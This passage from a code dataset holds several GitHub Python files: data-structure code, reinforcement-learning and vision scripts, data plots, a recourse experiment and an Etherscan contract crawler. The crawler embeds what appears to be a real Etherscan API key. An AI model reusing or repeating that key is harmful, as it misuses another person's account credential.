if list is empty\r\n self.InsertHead(node)\r\n return\r\n\r\n if not self.isSorted(): # if list is not sorted\r\n self.Sort() # sort the list before inserting the node\r\n\r\n current = self.head\r\n previous = None\r\n\r\n while current is not None and current.data < node.data:\r\n previous = current\r\n current = current.next\r\n if current == self.head: # reached end of the list, insert at tail\r\n self.InsertTail(node)\r\n return\r\n\r\n if previous is None: # insert at head\r\n self.InsertHead(node)\r\n elif current is None: # insert at tail\r\n self.InsertTail(node)\r\n else: # insert at specific position\r\n node.prev = previous\r\n node.next = current\r\n current.prev = node\r\n previous.next = node\r\n self.size += 1\r\n\r\n def isSorted(self):\r\n if self.head is None:\r\n return True\r\n\r\n current = self.head\r\n while current.next != self.head:\r\n if current.data > current.next.data:\r\n return False\r\n current = current.next\r\n return True\r\n\r\n def DeleteHead(self):\r\n if self.head is None:\r\n return None\r\n else:\r\n temp = self.head\r\n self.head = self.head.next\r\n if self.head is not None:\r\n self.head.prev = self.tail # point the new head's prev to the tail\r\n self.tail.next = self.head # point the tail's next to the new head\r\n else:\r\n 
self.tail = None\r\n temp.next = None\r\n temp.prev = None\r\n self.size -= 1\r\n return temp\r\n\r\n def DeleteTail(self):\r\n if self.tail is None:\r\n return None\r\n elif self.head == self.tail:\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n else:\r\n self.tail = self.tail.prev\r\n self.tail.next = self.head # close the loop\r\n self.head.prev = self.tail # update prev attribute of head node\r\n self.size -= 1\r\n\r\n def Delete(self, node):\r\n if self.head == node:\r\n self.head = node.next\r\n if self.head == self.tail: # if only one node in the list\r\n self.head.next = None\r\n self.tail.prev = None\r\n self.head.prev = None\r\n self.tail.next = None\r\n self.tail = self.head\r\n else:\r\n self.head.prev = None\r\n self.tail.next = self.head\r\n self.size -= 1\r\n return node\r\n\r\n current = self.head\r\n while current is not None and current != node:\r\n current = current.next\r\n\r\n if current is not None:\r\n if current == self.tail:\r\n self.tail = current.prev\r\n self.tail.next = self.head\r\n self.head.prev = self.tail\r\n else:\r\n current.prev.next = current.next\r\n current.next.prev = current.prev\r\n\r\n current.next = None\r\n current.prev = None\r\n self.size -= 1\r\n return current\r\n\r\n return None\r\n\r\n def Sort(self):\r\n if self.head is None or self.head.next is None:\r\n return\r\n\r\n while True:\r\n swapped = False\r\n prev = None\r\n curr = self.head\r\n while curr.next is not None and curr.next != self.head:\r\n if curr.data > curr.next.data:\r\n if prev is not None:\r\n prev.next = curr.next\r\n else:\r\n self.head = curr.next\r\n temp = curr.next.next\r\n curr.next.next = curr\r\n curr.next.prev = curr.prev\r\n curr.prev.next = curr.next\r\n curr.prev = curr.next\r\n curr.next = temp\r\n if temp is not None:\r\n temp.prev = curr\r\n prev = curr\r\n swapped = True\r\n else:\r\n prev = curr\r\n curr = curr.next\r\n\r\n if not swapped:\r\n break\r\n\r\n self.tail = curr\r\n\r\n def Clear(self):\r\n return super().Clear()\r\n\r\n def Print(self):\r\n print(f\"List size: {self.size}\")\r\n if self.isSorted():\r\n print(\"Sorted: Yes\")\r\n else:\r\n print(\"Sorted: No\")\r\n current = self.head\r\n print(\"Contents of list are...\\n\")\r\n while current is not None:\r\n print(current.data)\r\n current = current.next\r\n if current == self.head: # reached end of list and looped back to head\r\n break\r\n","repo_name":"SufyanAyaz/Data_Structures_Library_Project","sub_path":"myLib/datastructures/Linear/CDLL.py","file_name":"CDLL.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17808139245","text":"import numpy as np\nfrom ddpg import DDPG\nfrom ou_noise import OUNoise\nfrom environment.vrep_env import Env\nimport os\n\n#specify parameters here:\nepisodes=30000\nis_batch_norm = False #batch normalization switch\n\ndef main():\n env = Env(19997)\n steps= 10000\n num_states = 59\n num_actions = 3\n\n #Randomly initialize critic,actor,target critic, target actor network and replay buffer \n agent = DDPG(env, is_batch_norm)\n exploration_noise = OUNoise(num_actions)\n counter=0\n reward_per_episode = 0 \n total_reward=0\n reward_st = np.array([0])\n\n agent.actor_net.load_actor(os.getcwd() + '/weights/actor/model.ckpt')\n agent.critic_net.load_critic(os.getcwd() + '/weights/critic/model.ckpt')\n \n for i in range(episodes):\n # print \"==== Starting episode no:\",i,\"====\",\"\\n\"\n observation = env.reset()\n done =False\n 
reward_per_episode = 0\n        for t in range(steps):\n            x = observation\n            action = agent.evaluate_actor(np.reshape(x,[1,num_states]))\n            noise = exploration_noise.noise()\n            action = action[0] + noise #Select action according to current policy and exploration noise\n            \n            # clip each action component; the original reused `i` here, clobbering the episode index\n            for j in range(num_actions):\n                if action[j] > 1.0:\n                    action[j] = 1.0\n                if action[j] < -1.0:\n                    action[j] = -1.0\n\n            observation,reward,done = env.step(action)\n            print(\"reward:\", reward, \"\\n\")\n            agent.add_experience(x,observation,action,reward,done)\n            #train critic and actor network\n            if counter > 64: \n                agent.train()\n            reward_per_episode+=reward\n            counter+=1\n            #check if episode ends:\n            if (done or (t == steps-1)):\n                print('Episode',i,'Steps: ',t,'Episode Reward:',reward_per_episode)\n                exploration_noise.reset()\n                reward_st = np.append(reward_st,reward_per_episode)\n                np.savetxt('episode_reward.txt', reward_st, newline=\"\\n\")\n                agent.actor_net.save_actor(os.getcwd() + '/weights/actor/model.ckpt')\n                agent.critic_net.save_critic(os.getcwd() + '/weights/critic/model.ckpt')\n                break\n        total_reward+=reward_per_episode\n\nif __name__ == '__main__':\n    main() ","repo_name":"seongwonleee/CNN-DDPG-locked","sub_path":"Mecanum/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25209980908","text":"# La Croix Flavor Detector - Machine Learning on Raspberry Pi\n#\n# Michael D'Argenio\n# mjdargen@gmail.com\n# https://dargenio.dev\n# https://github.com/mjdargen\n# Created: February 6, 2020\n# Last Modified: February 27, 2020\n#\n# This program uses Tensorflow and OpenCV to detect objects in the video\n# captured from your webcam. This program is meant to be used with machine\n# learning models generated with Teachable Machine.\n#\n# Teachable Machine is a great machine learning model trainer and generator\n# created by Google. You can use Teachable Machine to create models to detect\n# objects in images, sounds in audio, or poses in images. For more info, go to:\n# https://teachablemachine.withgoogle.com/\n#\n# For this project, you will be generating an image object detection model. Go\n# to the website, click \"Get Started\" then go to \"Image Project\". Follow the\n# steps to create a model. 
Export the model as a \"Tensorflow->Keras\" model.\n#\n# To run this code in your environment, you will need to:\n# * Install Python 3 packages & library dependencies\n# * Use installation shell script\n# * Export your teachable machine tensorflow keras model and unzip it.\n# * You need both the .h5 file and labels.txt\n# * Update model_path to point to location of your keras model\n# * Update labels_path to point to location of your labels.txt\n# * Adjust width and height of your webcam for your system\n# * Adjust frameWidth with your video feed width in pixels\n# * Adjust frameHeight with your video feed height in pixels\n# * My RPi Camera v1.3 works well with 1024x768\n# * Set your confidence threshold\n# * conf_threshold by default is 90\n# * If video does not show up properly, use the matplotlib implementation\n# * Uncomment \"import matplotlib....\"\n# * Comment out \"cv2.imshow\" and \"cv2.waitKey\" lines\n# * Uncomment plt lines of code below\n# * Run \"sudo python3 hackathon.py\"\n\nimport multiprocessing\nimport numpy as np\nimport cv2\nimport tensorflow.keras as tf\nimport pyttsx3\nimport math\nimport time\nimport RPi.GPIO as GPIO\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\n# use matplotlib if cv2.imshow() doesn't work\n# import matplotlib.pyplot as plt\n\n\n# disable scientific notation for clarity\nnp.set_printoptions(suppress=True)\n\n# Pin Definitions\nclass_pin = [12,16,18,22] # BCM pin 18, BOARD pin 12\n\n# Pin Setup:\nGPIO.setmode(GPIO.BOARD) # BOARD pin-numbering scheme from Raspberry Pi\n# set pin as an output pin with optional initial state of LOW\nfor i in range(len(class_pin)):\n GPIO.setup(class_pin[i], GPIO.OUT, initial=GPIO.LOW)\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (224, 224)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=camera.resolution)\n# allow the camera to warmup\ntime.sleep(0.1)\n\n# read labels.txt file to get labels\nlabels_path = \"../labels.txt\"\n# open input file label.txt\nlabelsfile = open(labels_path, 'r')\n\n# initialize classes and read in lines until there are no more\nclasses = []\nline = labelsfile.readline()\nwhile line:\n # retrieve just class name and append to classes\n classes.append(line.split(' ', 1)[1].rstrip())\n line = labelsfile.readline()\n# close label file\nlabelsfile.close()\n\n# load the teachable machine model previously trained by teachable_machine \nmodel_path = '../keras_model.h5'\nmodel = tf.models.load_model(model_path, compile=False)\n\nframeHeight = frameWidth = 224\n\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n\n # Create the array of the right shape to feed into the keras model.\n # We are inputting 1x 224x224 pixel RGB image.\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n # turn the image into a numpy array\n image_array = np.asarray(image)\n # normalize the image\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n # load the image into the array\n data[0] = normalized_image_array\n\n # run the prediction. 
In the prediction, we have the % for all classes for classification\n predictions = model.predict(data)\n\n # confidence threshold is 90% so a class is recognize if its confidence % is over this threshold\n conf_threshold = 90\n confidence = []\n conf_label = \"\"\n threshold_class = \"\"\n # create black border at bottom for labels\n per_line = 1 # number of classes per line of text\n bordered_frame = cv2.copyMakeBorder(\n image,\n top=0,\n bottom=30 + 15*math.ceil(len(classes)/per_line),\n left=0,\n right=0,\n borderType=cv2.BORDER_CONSTANT,\n value=[0, 0, 0]\n )\n # for each one of the classes\n for i in range(0, len(classes)):\n # scale prediction confidence to % and apppend to 1-D list\n confidence.append(int(predictions[0][i]*100))\n # put text per line based on number of classes per line\n if (i != 0 and not i % per_line):\n cv2.putText(\n img=bordered_frame,\n text=conf_label,\n org=(int(0), int(frameHeight+25+15*math.ceil(i/per_line))),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5,\n color=(255, 255, 255)\n )\n conf_label = \"\"\n # append classes and confidences to text for label\n conf_label += classes[i] + \": \" + str(confidence[i]) + \"%; \"\n # prints last line\n if (i == (len(classes)-1)):\n cv2.putText(\n img=bordered_frame,\n text=conf_label,\n org=(int(0), int(frameHeight+25+15*math.ceil((i+1)/per_line))),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5,\n color=(255, 255, 255)\n )\n conf_label = \"\"\n # if above confidence threshold, send to queue\n if confidence[i] > conf_threshold:\n threshold_class = classes[i]\n GPIO.output(class_pin[i], True) # switch on the LED\n else:\n GPIO.output(class_pin[i], False) # Switch off the LED\n # add label class above confidence threshold\n cv2.putText(\n img=bordered_frame,\n text=threshold_class,\n org=(int(20), int(frameHeight)),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.75,\n color=(255, 255, 255)\n )\n \n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n \n # original video feed implementation\n cv2.imshow(\"Capturing\", bordered_frame)\n cv2.waitKey(10)\n\n # # if the above implementation doesn't work properly\n # # comment out two lines above and use the lines below\n # # will also need to import matplotlib at the top\n # plt_frame = cv2.cvtColor(bordered_frame, cv2.COLOR_BGR2RGB)\n # plt.imshow(plt_frame)\n # plt.draw()\n # plt.pause(.001)\n\n\n","repo_name":"raiv-toulouse/RPi_lab2","sub_path":"hackathon.py","file_name":"hackathon.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32478457746","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the largestRectangle function below.\n\nglobal curStreak\ncurStreak = []\n\ndef largestRectangle(h):\n largest = 0\n \n for i in range(len(h)):\n size = 1\n prev = i - 1\n while prev >= 0 and h[prev] >= h[i]:\n size += 1\n prev -= 1\n right = i + 1\n while right < len(h) and h[right] >= h[i]:\n size += 1\n right += 1\n if size*h[i] > largest:\n largest = size*h[i]\n\n return largest\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n h = list(map(int, input().rstrip().split()))\n\n result = largestRectangle(h)\n\n fptr.write(str(result) + '\\n')\n\n 
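# close the output file; the judge reads the result from OUTPUT_PATH\n    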
fptr.close()","repo_name":"JapneetSingh98/CodingPractice","sub_path":"HR_Python/miscellaneous/largestRectangle.py","file_name":"largestRectangle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9146603045","text":"import itertools\nexperiment_sets = [\n {\n 'aow': ('arch.area_object_weight', range(-1, 4)),\n 'cos': ('arch.cosine_sim', [False])\n },\n # {\n # 'apw': ('arch.area_pool_weight', range(-4, 3)),\n # 'cos': ('arch.cosine_sim', [True, False])\n # },\n]\n\nfor experiment_set in experiment_sets:\n configs = itertools.product(*[v[1] for v in experiment_set.values()])\n for conf in configs:\n exp_join = \"_\".join([f'{k}{cv}' for k, cv in zip(experiment_set, conf)])\n one_e = '1e'\n empty = ''\n para_join = \" \".join([f'{v[0]} {empty if isinstance(cv, bool) else one_e}{cv}' for v, cv in zip(experiment_set.values(), conf)])\n print(f\"cfg=\\\"exp_name mspacman_atari_{exp_join} {para_join}\\\"\")\n print(\"exp_name=$(echo \\\"$cfg\\\" | cut -d \\\" \\\" -f 2)\")\n print(\"../log_execution.sh \\\"Training TcSpace ${exp_name}\\\" python main.py --task train\"\n \" --config configs/atari_mspacman.yaml ${cfg}\")\n","repo_name":"k4ntz/MOC","sub_path":"src/multi_experiment_gen.py","file_name":"multi_experiment_gen.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"6693947127","text":"# -*- coding: utf-8 -*-\n# Created by wushuyi on 2016/9/8 0008.\nfrom flask import Blueprint\nfrom flask import url_for, send_from_directory\nfrom flask_security import current_user\nfrom flask_security.utils import config_value\nfrom flask_security.decorators import _check_token\n\nbt = Blueprint('home', __name__)\n\n\n@bt.route('/')\ndef index():\n _check_token()\n user = current_user\n if user.is_anonymous:\n res = '
Hello, World!\n{0}'.format(url_for('security.login'))\n    else:\n        res = 'Hello, {1}!\n
{0}'.format(url_for('security.logout'), user.name)\n return res\n\ndef configure(app):\n app.register_blueprint(bt)\n app.route\n","repo_name":"wushuyi/collie","sub_path":"collie/ext/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8671457409","text":"from slacker import Slacker\nimport socket\n\n### Set up slacker for status updates\nwith open('neurodata-slackr.conf', 'r') as fp:\n slack_token = fp.readline().strip()\n slack_channel = fp.readline().strip()\n\nslack = Slacker(slack_token)\n\nhost = socket.gethostname()\nslack.chat.post_message(slack_channel, f'`{host}`\\t Finished a run :partyparrot:')\n\n\n'''\nThe *.conf file should look like\n\n\n\n\n'''\n","repo_name":"neurodata/bohb_runs_sporf","sub_path":"msg.py","file_name":"msg.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11642871843","text":"import numpy as np\nimport urllib \nimport matplotlib.pyplot as plt \nimport cv2\n\n#funcion to read image from url\ndef url2image(url):\n resp = urlopen(url) # download image from url\n image = np.asarray(bytearray(resp.read()),dtype ='uint8') #convert it to a Numpy array\n image = cv2.imdecode(image, cv2.IMREAD_COLOR) # read it into OpenCV format\n return image\nimport sys\nif sys.version_info[0] == 3:\n from urllib.request import urlopen\nelse:\n from urllib import urlopen\nimport os.path\n\n#Main\n#load image from url\nbgr_img = url2image('https://phunghuy.files.wordpress.com/2012/10/steve-jobs1.jpg?w=1140')\ngray_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY)\nface_classifier_xml = 'my_haarcascade_frontalface_default.xml'\nret = os.path.exists(face_classifier_xml)\n\nif ret:\n print('the cascade classifier xml file already existed\\n')\nelse:\n print('downloading the cascade classifier xml file from internet...\\n')\n\nface_classifier_url = 'https://raw.githubusercontent.com/shantnu/Webcam-Face-Detect/master/'+'haarcascade_frontalface_default.xml'\n\nresp = urlopen(face_classifier_url)\ndata=resp.read()\nfh = open(face_classifier_xml, 'wb')\n\nfh.write(data)\nfh.close()\nresp.close()\n\nface_cascade = cv2.CascadeClassifier(face_classifier_xml)\nfaces = face_cascade.detectMultiScale(gray_img, 1.25, 3)\nfor(x,y,w,h) in faces:\n cv2.rectangle(bgr_img,(x,y),(x+w,y+h),(255,0,0),2)\n \nplt.axis('off')\nplt.title('face detecion result')\nplt.imshow(cv2.cvtColor(bgr_img,cv2.COLOR_BGR2RGB))\nplt.show()\n","repo_name":"edwardphuc/Machine-Learning-Basic","sub_path":"Document of Big Data and Deep Learning Lab/Face Detection.py","file_name":"Face Detection.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37912752881","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Code starts here\r\n\r\ndata = pd.read_csv(path,sep=',')\r\nprint(data.head(5))\r\nprint(data.columns)\r\n\r\nloan_status = data['Loan_Status'].value_counts()\r\nprint(loan_status)\r\nprint(type(loan_status))\r\n\r\nloan_status.plot(kind='bar')\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\nprint(data.columns)\r\nprint(data.head(5))\r\n\r\nproperty_and_loan = 
data.groupby(['Property_Area','Loan_Status'])\r\nprint(property_and_loan)\r\n\r\nproperty_and_loan = property_and_loan.size().unstack()\r\nprint(property_and_loan)\r\n\r\nproperty_and_loan.plot(kind='bar',stacked=False,figsize=(15,10))\r\nplt.xlabel(\"Property Area\")\r\nplt.ylabel(\"Loan Status\")\r\nplt.title(\"Loan Approval Distribution across the regions\")\r\nplt.xticks(rotation=45)\r\n\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\nprint(data.head(1))\r\nprint(data.columns)\r\n\r\neducation_and_loan = data.groupby(['Education','Loan_Status'])\r\nprint(education_and_loan)\r\n\r\neducation_and_loan = education_and_loan.size().unstack()\r\nprint(education_and_loan)\r\n\r\neducation_and_loan.plot(kind='bar',stacked=True,figsize=(15,10))\r\nplt.xlabel(\"Education Status\")\r\nplt.ylabel(\"Loan Status\")\r\nplt.xticks(rotation=45)\r\nplt.title(\"Relating Higher Education in Issuing Loans\")\r\n\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\n\r\nprint(data.head(1))\r\nprint(data.columns)\r\n\r\ngraduate = data[data[\"Education\"] == \"Graduate\"]\r\n#print(graduate)\r\nprint(type(graduate))\r\n\r\nnot_graduate = data[data[\"Education\"] == \"Not Graduate\"]\r\n#print(not_graduate)\r\nprint(type(not_graduate))\r\n\r\ngraduate[\"LoanAmount\"].plot(kind='density',label='Graduate')\r\n\r\nnot_graduate[\"LoanAmount\"].plot(kind='density',label='Not Graduate')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Code ends here\r\n\r\n#For automatic legend display\r\nplt.legend()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\ndata['TotalIncome'] = data['ApplicantIncome'] + data['CoapplicantIncome']\r\nprint(data.columns)\r\nprint(data.head(2))\r\nfig, (ax_1,ax_2,ax_3) = plt.subplots(nrows = 3, ncols=1, figsize=(20,8))\r\n\r\n'''\r\nplt.scatter(data[\"ApplicantIncome\"],data[\"LoanAmount\"])\r\nplt.title(\"Applicant Income\")\r\n\r\ndata.plot.scatter(x=\"ApplicantIncome\",y=\"LoanAmount\")\r\nplt.ax_1.title(\"Applicant Income\")\r\n\r\ndata.plot.scatter(x=\"CoapplicantIncome\",y=\"LoanAmount\")\r\nplt.ax_2.title(\"Coapplicant Income\")\r\n\r\ndata.plot.scatter(x='TotalIncome',y='LoanAmount')\r\nplt.ax_3.title(\"Total Income\")\r\n'''\r\nax_1.scatter(data[\"ApplicantIncome\"],data[\"LoanAmount\"])\r\nax_1.set(title=\"Applicant Income\")\r\n\r\nax_2.scatter(data[\"CoapplicantIncome\"],data[\"LoanAmount\"])\r\nax_2.set(title=\"Coapplicant Income\")\r\n\r\nax_3.scatter(data['TotalIncome'],data['LoanAmount'])\r\nax_3.set(title=\"Total Income\")\r\n\r\nplt.show()\n\n\n","repo_name":"pavanmakineni/ga-learner-dsb-repo","sub_path":"Visualization-for-company-stakeholders/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6254452144","text":"import logging\nlogging.getLogger().setLevel(logging.INFO)\n\nimport os\nimport copy\nimport random\nimport argparse\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import log_loss, accuracy_score\nimport numpy as np\nimport math\n\nfrom mcr.recourse import recourse_population, save_recourse_result\nfrom mcr.causality.scm import BinomialBinarySCM, SigmoidBinarySCM\n\n\ndef load_problem(path, type='binomial'):\n scm = None\n if type == 'binomial':\n scm = 
BinomialBinarySCM.load(path)\n elif type == 'sigmoid':\n scm = SigmoidBinarySCM.load(path)\n else:\n raise NotImplementedError('only binomial or sigmoid')\n y_name = scm.predict_target\n return scm, y_name\n\n\ndef run_robustness_experiment(savepath, scm, y_name, gamma, eta, lbd, thresh, costs, N, model_type='logreg'):\n\n # GENERATE THREE BATCHES OF DATA\n\n noise = scm.sample_context(N)\n df = scm.compute()\n\n X = df[df.columns[df.columns != y_name]]\n y = df[y_name]\n\n batch_size = math.floor(N / 3)\n\n logging.info('Creating three batches of data with {} observations'.format(batch_size))\n\n batches = []\n i = 0\n\n while i < N:\n X_i, y_i = X.iloc[i:i + batch_size, :], y.iloc[i:i + batch_size]\n U_i = noise.iloc[i:i + batch_size, :]\n batches.append((X_i, y_i, U_i))\n i += batch_size\n\n # FITTING MODEL 1 ON BATCH 0\n\n logging.info('Fitting a model on batch 0')\n\n model = None\n if model_type == 'logreg':\n model = LogisticRegression()\n elif model_type == 'rf':\n rf = RandomForestClassifier(n_estimators=5)\n model = rf\n\n model.fit(batches[0][0], batches[0][1])\n # assert model.predict_proba([[0, 0, 0, 0, 0, 1, 1, 1, 1]])[0][1] > 0.95\n\n model.predict(batches[1][0])\n\n perf1 = log_loss(batches[0][1], model.predict_proba(batches[0][0]))\n perf2 = accuracy_score(batches[0][1], model.predict(batches[0][0]))\n\n\n # EXPERIMENTS\n\n r_types = ['individualized', 'subpopulation']\n t_types = ['improvement', 'acceptance']\n\n\n ## How well does the model predict in different pre- and post-recourse enviornments?\n ## How meaningful is the recourse? (i.e. what is the improvement probability)\n ## What is the acceptance probability?\n\n # t_type = 'improvement'\n # r_type = 'individualized'\n\n for r_type in r_types:\n for t_type in t_types:\n savepath_run = savepath + '{}_{}/'.format(t_type, r_type)\n\n try:\n os.mkdir(savepath_run)\n except FileExistsError as err:\n logging.info('Folder {} already exists'.format(savepath_run))\n except Exception as err:\n print('could not create folder.')\n raise err\n\n logging.info('Recourse type: {}, {}'.format(r_type, t_type))\n\n ## Perform CR on batches 1 and 2\n\n logging.info('Batches 1 and 2 are replace with post-recourse data')\n logging.info('Batch 0 is left as-is')\n\n # for batches 1 and 2 recourse is performed\n result_tuples = []\n\n for ii in [1, 2]:\n tpl = recourse_population(scm, batches[ii][0], batches[ii][1],\n batches[ii][2], y_name, costs,\n proportion=0.8, r_type=r_type,\n t_type=t_type, gamma=gamma, eta=eta,\n lbd=lbd,\n thresh=thresh,\n subpopulation_size=200,\n model=model,\n use_scm_pred=False)\n result_tuples.append(tpl)\n U, X_pre, y_pre, y_hat_pre, interventions, X_post, y_post, h_post, costss, stats = tpl\n logging.info(stats)\n\n save_recourse_result(savepath_run + 'batch1_', result_tuples[0])\n save_recourse_result(savepath_run + 'batch2_', result_tuples[1])\n\n ## Application to batch 2\n ## refitting model on batch 0 and 1\n ## computing recourse on batch 2 with respect to original model\n ## assessing whether recourse is honored by the new model\n\n logging.info('A second model is fit on batches 0 (pre-recourse) and 1 (post-recourse)')\n\n batches_post = copy.deepcopy(batches)\n\n for ii in [1, 2]:\n X_post, y_post = result_tuples[ii - 1][5], result_tuples[ii - 1][6]\n batches_post[ii][0].iloc[X_post.index, :] = X_post\n batches_post[ii][1].iloc[y_post.index] = y_post\n\n\n # fit model on batch 1\n # batch 0 post is identical to batch 0 pre\n X_train2 = batches_post[1][0]\n y_train2 = batches_post[1][1]\n\n model2 = 
None\n if model_type == 'logreg':\n model2 = LogisticRegression()\n elif model_type == 'rf':\n model2 = RandomForestClassifier(n_estimators=5)\n model2.fit(X_train2, y_train2)\n\n logging.info('The refit on pre- and post-recourse data has coefficients {}'.format(model2.coef_))\n\n models = [model, model2]\n\n for nr in [0, 1]:\n # np.savetxt(savepath_run + 'model{}_coef.csv'.format(nr), np.array(models[nr].coef_), delimiter=',')\n X_post_nr, y_post_nr = result_tuples[nr][5], result_tuples[nr][6]\n invs = result_tuples[nr][4]\n recourse_performed = invs[invs.sum(axis=1) >= 1].index\n X_post_nr = X_post_nr.loc[recourse_performed, :]\n y_post_nr = y_post_nr.loc[recourse_performed]\n\n if len(recourse_performed) > 0:\n predict2 = models[nr].predict(X_post_nr)\n np.savetxt(savepath_run + 'predict{}.csv'.format(nr), predict2, delimiter=',')\n\n perf1 = log_loss(y_post_nr, model.predict_proba(X_post_nr), labels=[0, 1])\n perf2 = accuracy_score(y_post_nr, model.predict(X_post_nr))\n\n logging.info(\"Performance of refit on post-recourse data: {} log-loss and {}% accuracy\".format(perf1, perf2))\n\n # predict on batch 2 and see whether recourse is honored\n\n percentage_honored = np.mean(predict2)\n logging.info('-----')\n logging.info('Recourse honored only for {} per cent'.format(percentage_honored))\n logging.info('=====')\n\nif __name__ == '__main__':\n # DEFINE LOGGING LEVEL\n\n # logging.getLogger().setLevel(logging.INFO)\n # parsing command line arguments\n parser = argparse.ArgumentParser(\"Create recourse experiments. \" +\n \"For every configuration a separate folder is created. \" +\n \"Within every folder a folder for every interation is created.\" +\n \"The savepath specifies the folder in which these folders shall be placed.\")\n\n parser.add_argument(\"scm_loadpath\", help=\"loadpath for scm to be used\", default=None, type=str)\n parser.add_argument(\"gamma\", help=\"gammas for recourse\", type=float)\n parser.add_argument(\"lbd\", help=\"lambda for optimization\", default=10.0, type=float)\n parser.add_argument(\"thresh\", help=\"threshs for prediction and recourse\", type=float)\n parser.add_argument(\"N\", help=\"Number of observations\", type=int)\n parser.add_argument(\"savepath\",\n help=\"savepath for the experiment folder. 
either relative to working directory or absolute.\",\n type=str)\n\n parser.add_argument(\"--seed\", help=\"seed\", default=42, type=int)\n parser.add_argument(\"--logging_level\", help=\"logging-level\", default=20, type=int)\n parser.add_argument(\"--scm_type\", help=\"class of scm\", default='binomial', type=str)\n parser.add_argument(\"--model_type\", help='ml model class', default='logreg', type=str)\n\n args = parser.parse_args()\n\n # set logging settings\n logging.getLogger().setLevel(args.logging_level)\n random.seed(args.seed)\n\n scm, y_name = load_problem(args.scm_loadpath, type=args.scm_type)\n costs = np.load(args.scm_loadpath + 'costs.npy')\n\n # expects that we are in a directory with a subfolder called \"experiments\"\n # relative save paths\n config_id = random.randint(0, 1024)\n savepath_config = args.savepath + 'gamma_{}_N_{}_id_{}/'.format(args.gamma, args.N, config_id)\n\n n_tries = 0\n done = False\n while n_tries < 5 and not done:\n try:\n n_tries += 1\n os.mkdir(savepath_config)\n done = True\n except Exception as err:\n logging.warning('Could not generate folder...{}'.format(savepath_config))\n\n run_robustness_experiment(savepath_config, scm, y_name, args.gamma, args.gamma, args.lbd, args.thresh, costs,\n args.N, model_type=args.model_type)\n","repo_name":"anonomyzed-submission/mcr","sub_path":"scripts/experiment-robustness.py","file_name":"experiment-robustness.py","file_ext":"py","file_size_in_byte":9048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40465008651","text":"import urllib.request\r\nimport json\r\nimport time\r\nimport os\r\nfrom multiprocessing import Process,Queue\r\nfrom tqdm import tqdm\r\nfrom token_info import token_list as token\r\n\r\nbase_url = \"https://api.etherscan.io/api?module=contract&action=getsourcecode\"\r\napikey = \"&apikey=68I2GBGUU79X6YSIMA8KVGIMYSKTS6UDPI\" # input your api key, you can get it from https://etherscan.io/myapikey\r\n\r\n\r\ndef producer(q,path):\r\n\r\n local_addrs = set()\r\n for addr in os.listdir(os.path.join(path,'raws')):\r\n local_addrs.add(addr)\r\n print('local',len(local_addrs))\r\n\r\n contracts = []\r\n with open(os.path.join(path,'htmls.json'), 'r') as fr:\r\n line = fr.readline()\r\n while line != '':\r\n c = json.loads(line)\r\n if c['address'] not in local_addrs:\r\n contracts.append(c)\r\n line = fr.readline()\r\n fr.close()\r\n\r\n for c in tqdm(contracts):\r\n q.put(c)\r\n time.sleep(0.2)\r\n\r\n\r\ndef consumer(q,path):\r\n\r\n while 1:\r\n c = q.get()\r\n if c:\r\n _request_one(c['address'],os.path.join(path,'raws'))\r\n else:\r\n time.sleep(0.1)\r\n break\r\n\r\ndef 